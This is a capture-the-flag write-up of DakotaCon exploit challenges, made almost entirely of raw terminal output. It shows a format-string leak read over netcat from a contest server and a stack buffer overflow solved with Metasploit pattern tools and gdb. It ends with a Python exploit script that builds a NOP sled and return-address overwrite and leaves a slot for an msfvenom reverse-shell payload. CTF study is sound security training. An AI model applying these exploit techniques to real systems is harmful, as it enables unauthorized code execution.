Local CTF team over at SecDSM tied for 2nd place on this one. Thanks to the great folks over at DakotaCon for settings this up.

Below are some raw outputs of how we accomplished each task. It’s not a very detailed write up as of yet, but it may be edited in the future, especially when I get to the RE challenges.

Exploit 100

This one was a simple format string exploit that opened a flag file and saved it on the stack. Because of this, we are able to read the flag from the stack.

[email protected]:~/DakotaCon/Exploit100# python -c'print "%08x" * 400' | nc 138.247.115.12 3268
Enter your message: 00000064f76fd5a0fff5a248f7732a7400000001f77012e809e97008757065526c6261746d6552657948786974617264000a6465000000c2f75dc76bfff5a23efff5a33c78383025783830257838302578383025783830257838302578383025
[email protected]:~/DakotaCon/Exploit100#
[email protected]:~/DakotaCon/Exploit100# 
[email protected]:~/DakotaCon/Exploit100# echo "00000064f77875a0ff8af148f77bca7400000001f778b2e809fde008757065526c6261746d6552657948786974617264000a6465000000c2f766676bff8af13eff8af23c78383025783830257838302578383025783830257838302578383025" | fold -w8 > strings.txt && for i in $(tac strings.txt); do echo $i | xxd -r -p; done
x80%x80%x80%x80%x80%x80%x80%???<???>?fgk?
detardyHximeRelbatupeR	??x???{?t???H?
[email protected]:~/DakotaCon/Exploit100# echo detardyHximeRelbatupeR | rev
ReputableRemixHydrated

Exploit 250

[email protected]:~/DakotaCon/Exploit250# ./exploit250 
0x80484cb
Enter your message: string
0xbfb398b0
string

[email protected]:~/DakotaCon/Exploit250# python -c'print "A" * 100' | ./exploit250 
0x80484cb
Enter your message: 0xbf84f8b0
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

[email protected]:~/DakotaCon/Exploit250# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100 > input.txt
[email protected]:~/DakotaCon/Exploit250# 

[email protected]:~/DakotaCon/Exploit250# gdb -q ./exploit250
Reading symbols from ./exploit250...(no debugging symbols found)...done.

gdb-peda$ r < input.txt
Starting program: /root/DakotaCon/Exploit250/exploit250 < input.txt
0x80484cb
Enter your message: 0xbffff550
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

...SNIP...
EIP: 0x63413563 ('c5Ac')
...SNIP...
Stopped reason: SIGSEGV
0x63413563 in ?? ()
gdb-peda$ 

[email protected]:~/DakotaCon/Exploit250# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 100 -q 0x63413563
[*] Exact match at offset 76
[email protected]:~/DakotaCon/Exploit250# python -c'print "A" * 76 + "\xef\xbe\xad\xde"' > input.txt
[email protected]:~/DakotaCon/Exploit250# 

...SNIP...
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xdeadbeef in ?? ()
...SNIP...

gdb-peda$ x/s 0xbffff550
0xbffff550:	'A' <repeats 76 times>, <incomplete sequence \336>

[email protected]:~/DakotaCon/Exploit250# python -c'print "A" * 76 + "\xef\xbe\xad\xde" + "C" * 400' > input.txt

gdb-peda$ x/s 0xbffff550
0xbffff550:	'A' <repeats 76 times>, "οΎ­\336", 'C' <repeats 120 times>...



from struct import *

payload = "\xeb\x08"    # Short Jump

ret = pack("<L", 0xbffff550)    # Memory location of our NOP sled
offset = 76

sploit = "\x90"*(offset - len(payload))
sploit += payload
sploit += ret

payload =  "\x90" * 20
payload += # msfvenom generated payload with linux/x86/shell_reverse_tcp

# [74 NOP][Short Jump][Return][20 NOP][PAYLOAD]
sploit += payload

print sploit